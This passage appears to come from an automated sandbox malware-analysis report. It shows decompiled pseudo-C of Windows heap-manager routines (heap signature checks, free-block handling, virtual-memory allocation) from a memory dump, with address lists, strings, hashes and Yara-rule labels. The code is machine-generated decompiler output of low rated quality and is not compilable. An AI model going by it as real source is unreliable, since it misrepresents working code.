                                      • WindowsExcludedProcs, xrefs: 01983D6F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
                                      • Opcode ID: 1fca2f81c6ff6d819f827193fa4d9ec84cd472403cc8d7a947b07b9700672119
                                      • Instruction ID: 1b85bc8c2391f16a96a4efd459a8c379c1a16d393bba2cb31b02f4e7874de42c
                                      • Opcode Fuzzy Hash: 1fca2f81c6ff6d819f827193fa4d9ec84cd472403cc8d7a947b07b9700672119
                                      • Instruction Fuzzy Hash: EDF12D72D10619EFCF11EF98C980AEEBBBDFF58650F14446AE909A7251E7349E01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019740E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 29%
                                      			E019740E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0197B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0197B150(", passed to %s", _t29);
					}
					_push("\n");
					E0197B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1a66378 = 1;
						asm("int3");
						 *0x1a66378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                      0x019740e6
                                      0x019740e8
                                      0x019740f1
                                      0x019d042d
                                      0x019d044c
                                      0x019d0451
                                      0x019d042f
                                      0x019d0444
                                      0x019d0449
                                      0x019d045d
                                      0x019d0466
                                      0x019d046e
                                      0x019d0474
                                      0x019d0475
                                      0x019d047a
                                      0x019d048a
                                      0x019d048c
                                      0x019d0493
                                      0x019d0494
                                      0x019d0494
                                      0x00000000
                                      0x019d049b
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                      • API String ID: 0-188067316
                                      • Opcode ID: d89b1882901b7032a25c2a8f760800633fa52ac19dd9667741d49cf1709de926
                                      • Instruction ID: e5176b2c459089270d7a304c3cc1cb05e6d33e953f5ac89ef0c07fd2c4897021
                                      • Opcode Fuzzy Hash: d89b1882901b7032a25c2a8f760800633fa52ac19dd9667741d49cf1709de926
                                      • Instruction Fuzzy Hash: A7014C36104241AEE325DB69F40DF927BA8EFC1F30F1C802DF40D57641EAA49440C315
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199A830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 70%
                                      			E0199A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1a68748 - 1;
					if( *0x1a68748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
									_t260 = _t257 + 4;
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0197B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1a67bc8;
								if(__eflags == 0) {
									E01A32073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E01A3A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E019CD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0199AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E01A3A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E01A3A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1a68748 - 1;
					if( *0x1a68748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0197B150();
							} else {
								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0197B150();
							__eflags =  *0x1a67bc8;
							if(__eflags == 0) {
								_t131 = E01A32073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                      0x0199a83a
                                      0x0199a83c
                                      0x0199a83e
                                      0x0199a841
                                      0x0199a844
                                      0x0199a84a
                                      0x0199aa53
                                      0x0199aa59
                                      0x0199aa59
                                      0x0199a858
                                      0x0199a85e
                                      0x0199aaf5
                                      0x0199aafc
                                      0x019e229e
                                      0x019e22a2
                                      0x019e22a8
                                      0x019e22b3
                                      0x019e22b5
                                      0x019e22bb
                                      0x019e22c1
                                      0x019e22c5
                                      0x019e22e6
                                      0x019e22eb
                                      0x019e22f0
                                      0x019e22c7
                                      0x019e22dc
                                      0x019e22e1
                                      0x019e22e1
                                      0x019e22f3
                                      0x019e22f8
                                      0x019e22fd
                                      0x019e2300
                                      0x019e2307
                                      0x019e230e
                                      0x019e230e
                                      0x019e2313
                                      0x019e2313
                                      0x019e22b5
                                      0x019e22a2
                                      0x0199aafc
                                      0x0199a864
                                      0x0199a869
                                      0x0199aa5c
                                      0x0199aa5e
                                      0x0199a86f
                                      0x0199a87f
                                      0x0199a885
                                      0x0199a885
                                      0x0199a88b
                                      0x0199a890
                                      0x0199a896
                                      0x0199ab0c
                                      0x0199ab0f
                                      0x0199ab15
                                      0x019e2320
                                      0x019e2320
                                      0x0199ab1b
                                      0x0199a89c
                                      0x0199a89f
                                      0x0199a8a2
                                      0x0199a8a2
                                      0x0199a8a5
                                      0x0199a8af
                                      0x0199a8b3
                                      0x0199a8b8
                                      0x0199aa66
                                      0x0199a8be
                                      0x0199a8c5
                                      0x0199a8c6
                                      0x0199a8ce
                                      0x019e2328
                                      0x019e2332
                                      0x019e2337
                                      0x019e2337
                                      0x0199a8ce
                                      0x0199a8d4
                                      0x0199a8d8
                                      0x0199a8db
                                      0x0199a8de
                                      0x0199a8e1
                                      0x0199a8e5
                                      0x0199a8e8
                                      0x0199a8f0
                                      0x0199a8f3
                                      0x019e234c
                                      0x019e2350
                                      0x019e2355
                                      0x019e2359
                                      0x019e2359
                                      0x0199a8f9
                                      0x0199a901
                                      0x0199aae4
                                      0x0199aae4
                                      0x0199aaea
                                      0x00000000
                                      0x0199a907
                                      0x0199a90a
                                      0x0199a91d
                                      0x0199a91d
                                      0x00000000
                                      0x0199a910
                                      0x0199a910
                                      0x0199a910
                                      0x0199a914
                                      0x0199a924
                                      0x0199a924
                                      0x0199a924
                                      0x0199a924
                                      0x0199a916
                                      0x0199a91b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0199a91b
                                      0x0199a925
                                      0x0199a925
                                      0x0199a932
                                      0x0199a936
                                      0x0199a93c
                                      0x0199a93c
                                      0x0199a93c
                                      0x0199ab22
                                      0x0199ab24
                                      0x0199ab27
                                      0x0199ab27
                                      0x0199a942
                                      0x0199a944
                                      0x0199aaba
                                      0x0199aabd
                                      0x0199aac0
                                      0x0199aac0
                                      0x0199aac2
                                      0x0199ab2f
                                      0x0199aac4
                                      0x0199aac4
                                      0x0199aac7
                                      0x0199aaca
                                      0x0199aacc
                                      0x0199aace
                                      0x0199aace
                                      0x0199aace
                                      0x0199aad1
                                      0x0199aad1
                                      0x0199aad7
                                      0x0199aad9
                                      0x00000000
                                      0x00000000
                                      0x019e2361
                                      0x019e2369
                                      0x019e236b
                                      0x00000000
                                      0x019e2371
                                      0x00000000
                                      0x019e2371
                                      0x00000000
                                      0x019e236b
                                      0x0199aac0
                                      0x0199a94a
                                      0x0199a94a
                                      0x0199a94d
                                      0x0199a94d
                                      0x0199a950
                                      0x0199a954
                                      0x019e2376
                                      0x019e2380
                                      0x0199a95a
                                      0x0199a95a
                                      0x0199a95c
                                      0x0199a95f
                                      0x0199a961
                                      0x0199a961
                                      0x0199a967
                                      0x0199a96a
                                      0x0199a972
                                      0x0199aa02
                                      0x0199aa06
                                      0x0199aa10
                                      0x0199aa16
                                      0x0199aa16
                                      0x0199aa1b
                                      0x0199aa21
                                      0x0199aa24
                                      0x0199aa27
                                      0x0199aa29
                                      0x0199aa2c
                                      0x0199aa32
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0199a978
                                      0x0199a978
                                      0x0199a97b
                                      0x0199a981
                                      0x0199a996
                                      0x0199a998
                                      0x0199a99f
                                      0x0199a9a2
                                      0x019e238a
                                      0x0199a9a8
                                      0x0199a9a8
                                      0x0199a9a8
                                      0x0199a9aa
                                      0x0199a9ad
                                      0x0199a9b0
                                      0x0199a9bb
                                      0x0199a9be
                                      0x0199a9c7
                                      0x0199a9c9
                                      0x0199a9c9
                                      0x0199a9cc
                                      0x0199a9d1
                                      0x0199aa6d
                                      0x0199aa70
                                      0x0199aa73
                                      0x0199aa75
                                      0x0199aa79
                                      0x0199aa7e
                                      0x0199aa82
                                      0x0199aa8f
                                      0x0199aa94
                                      0x0199aa96
                                      0x019e2392
                                      0x019e23a1
                                      0x019e23a1
                                      0x0199aa9c
                                      0x0199aa9f
                                      0x0199aaa2
                                      0x0199aaa2
                                      0x0199aaa8
                                      0x0199aaab
                                      0x0199aaaf
                                      0x00000000
                                      0x0199aab5
                                      0x00000000
                                      0x0199aab5
                                      0x0199a9d7
                                      0x0199a9d7
                                      0x0199a9da
                                      0x0199a9e0
                                      0x0199a9e3
                                      0x0199a9e6
                                      0x0199a9e9
                                      0x0199a9eb
                                      0x0199a9fd
                                      0x0199a9fd
                                      0x00000000
                                      0x0199a9eb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0199a983
                                      0x0199a983
                                      0x0199a983
                                      0x0199a987
                                      0x0199a995
                                      0x0199a995
                                      0x0199a995
                                      0x0199a995
                                      0x0199a989
                                      0x0199a98e
                                      0x00000000
                                      0x0199a990
                                      0x00000000
                                      0x0199a990
                                      0x0199a98e
                                      0x00000000
                                      0x0199a983
                                      0x0199a972
                                      0x0199a90a
                                      0x0199aa34
                                      0x0199aa34
                                      0x0199aa40
                                      0x0199aa43
                                      0x0199aa46
                                      0x0199aa4d
                                      0x019e23ab
                                      0x019e23b2
                                      0x019e23b8
                                      0x019e23be
                                      0x019e23c3
                                      0x019e23c5
                                      0x019e23cb
                                      0x019e23d1
                                      0x019e23d5
                                      0x019e23f6
                                      0x019e23fb
                                      0x019e23d7
                                      0x019e23ec
                                      0x019e23f1
                                      0x019e2403
                                      0x019e2408
                                      0x019e2410
                                      0x019e2417
                                      0x019e2422
                                      0x019e2422
                                      0x019e2417
                                      0x019e23c5
                                      0x019e23b2
                                      0x00000000

                                      Strings
                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019E2403
                                      • HEAP: , xrefs: 019E22E6, 019E23F6
                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019E22F3
                                      • HEAP[%wZ]: , xrefs: 019E22D7, 019E23E7
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                      • API String ID: 0-1657114761
                                      • Opcode ID: a396c46b8cf33e39ddd407c978b94cf28ff8ca78f0cb217ae3a4be10c5ddf19a
                                      • Instruction ID: d24d4b5b16eb3c949a7965414291165162c7eb9b7a21c3df16d8599ef7ed4a67
                                      • Opcode Fuzzy Hash: a396c46b8cf33e39ddd407c978b94cf28ff8ca78f0cb217ae3a4be10c5ddf19a
                                      • Instruction Fuzzy Hash: 16D1BC34A002469FDF19CF6DC490BAABBF6FF88300F158569D99E9B746E334A841CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199A229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 69%
                                      			E0199A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0199DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E019B9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E01A3A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E019B9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0197B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01997D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E01A3138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01997D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01997D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01A31582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01997D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01997D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01A31582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E019CD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                      0x0199a229
                                      0x0199a231
                                      0x0199a23f
                                      0x0199a242
                                      0x0199a244
                                      0x0199a24c
                                      0x0199a255
                                      0x0199a25a
                                      0x0199a25f
                                      0x019e1c76
                                      0x019e1c78
                                      0x019e1c7e
                                      0x019e1c7f
                                      0x019e1c81
                                      0x019e1c82
                                      0x019e1c84
                                      0x019e1c89
                                      0x019e1c8b
                                      0x019e1c9e
                                      0x019e1c9e
                                      0x019e1cab
                                      0x019e1cb2
                                      0x00000000
                                      0x019e1cb2
                                      0x019e1c8d
                                      0x019e1c92
                                      0x00000000
                                      0x00000000
                                      0x019e1c94
                                      0x019e1c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019e1c98
                                      0x0199a265
                                      0x0199a265
                                      0x0199a266
                                      0x0199a26f
                                      0x0199a270
                                      0x0199a276
                                      0x0199a277
                                      0x0199a279
                                      0x0199a27e
                                      0x0199a282
                                      0x019e1db5
                                      0x019e1dbb
                                      0x019e1dc1
                                      0x019e1dc5
                                      0x019e1de4
                                      0x019e1de9
                                      0x019e1dc7
                                      0x019e1ddc
                                      0x019e1de1
                                      0x019e1def
                                      0x019e1df3
                                      0x019e1df7
                                      0x019e1dfe
                                      0x019e1e06
                                      0x0199a302
                                      0x0199a308
                                      0x0199a308
                                      0x0199a288
                                      0x0199a28d
                                      0x0199a294
                                      0x019e1cc1
                                      0x0199a29a
                                      0x0199a29a
                                      0x0199a29a
                                      0x0199a29f
                                      0x019e1ccb
                                      0x019e1cd1
                                      0x019e1cd8
                                      0x019e1cea
                                      0x019e1cea
                                      0x019e1cd8
                                      0x0199a2a9
                                      0x0199a2af
                                      0x0199a2bc
                                      0x019e1cfd
                                      0x0199a2c2
                                      0x0199a2c2
                                      0x0199a2c2
                                      0x0199a2c7
                                      0x019e1d07
                                      0x019e1d0d
                                      0x019e1d14
                                      0x019e1d1f
                                      0x019e1d21
                                      0x019e1d2c
                                      0x019e1d2c
                                      0x019e1d2c
                                      0x019e1d47
                                      0x019e1d47
                                      0x019e1d14
                                      0x0199a2cd
                                      0x0199a2d2
                                      0x0199a2d9
                                      0x019e1d5a
                                      0x0199a2df
                                      0x0199a2df
                                      0x0199a2df
                                      0x0199a2e4
                                      0x019e1d69
                                      0x019e1d6b
                                      0x019e1d76
                                      0x019e1d76
                                      0x019e1d76
                                      0x019e1d91
                                      0x019e1d91
                                      0x0199a2ea
                                      0x0199a2f0
                                      0x0199a2f5
                                      0x019e1da8
                                      0x019e1dad
                                      0x019e1dad
                                      0x0199a2fd
                                      0x0199a300
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                      • API String ID: 2994545307-2586055223
                                      • Opcode ID: 5bb61741ac78f2a1c7931aaec704cf50fb95d0b4e7e27a06ecd050bf4c8342e4
                                      • Instruction ID: e8f2457d8153befdb11b3a96649d809b1e8f9546fc56a210b9abc23db5f226ce
